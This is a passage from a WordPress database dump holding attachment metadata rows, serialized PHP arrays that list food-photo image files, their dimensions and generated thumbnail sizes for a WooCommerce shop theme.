ngue3_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-600x389.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12035,4951,'_wp_attached_file','2020/04/spelt_bread_880x.jpg'),(12036,4951,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:28:\"2020/04/spelt_bread_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"spelt_bread_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"spelt_bread_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"spelt_bread_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1395575067\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12037,4952,'_wp_attached_file','2020/04/wrap_1_880x.jpg'),(12038,4952,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:588;s:4:\"file\";s:23:\"2020/04/wrap_1_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"wrap_1_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-550x588.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"wrap_1_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"wrap_1_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1506667174\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12044,4690,'_thumbnail_id','4948'),(12048,4694,'_thumbnail_id','4949'),(12052,4689,'_thumbnail_id','4952'),(12057,4691,'_thumbnail_id','4950'),(12062,4676,'_thumbnail_id','4951'),(12064,4953,'_wp_attached_file','2020/04/Christmas_pancakes_insta_880x.jpg'),(12065,4953,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:41:\"2020/04/Christmas_pancakes_insta_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:41:\"Christmas_pancakes_insta_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1511015897\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12066,4954,'_wp_attached_file','2020/04/gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x.jpg'),(12067,4954,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:61:\"2020/04/gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-550x427.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-550x427.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:61:\"gnochh5_8ca93657-e57f-4cd1-b180-36a6e979c33f_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1493015956\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12068,4955,'_wp_attached_file','2020/04/icecream_landsc2small_880x.jpg'),(12069,4955,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:586;s:4:\"file\";s:38:\"2020/04/icecream_landsc2small_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-550x586.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"icecream_landsc2small_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1463066486\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12070,4956,'_wp_attached_file','2020/04/Icecream_pineapple2fw_880x.jpg'),(12071,4956,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:38:\"2020/04/Icecream_pineapple2fw_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"Icecream_pineapple2fw_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1465486623\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12072,4957,'_wp_attached_file','2020/04/icecream4_880x.jpg'),(12073,4957,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:635;s:4:\"file\";s:26:\"2020/04/icecream4_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"icecream4_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-600x433.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-300x216.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-768x554.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:554;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-550x635.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:635;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"icecream4_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-600x433.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"icecream4_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1494979354\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12074,4958,'_wp_attached_file','2020/04/Kale_Spinach_ballssquare_880x.jpg'),(12075,4958,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:41:\"2020/04/Kale_Spinach_ballssquare_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"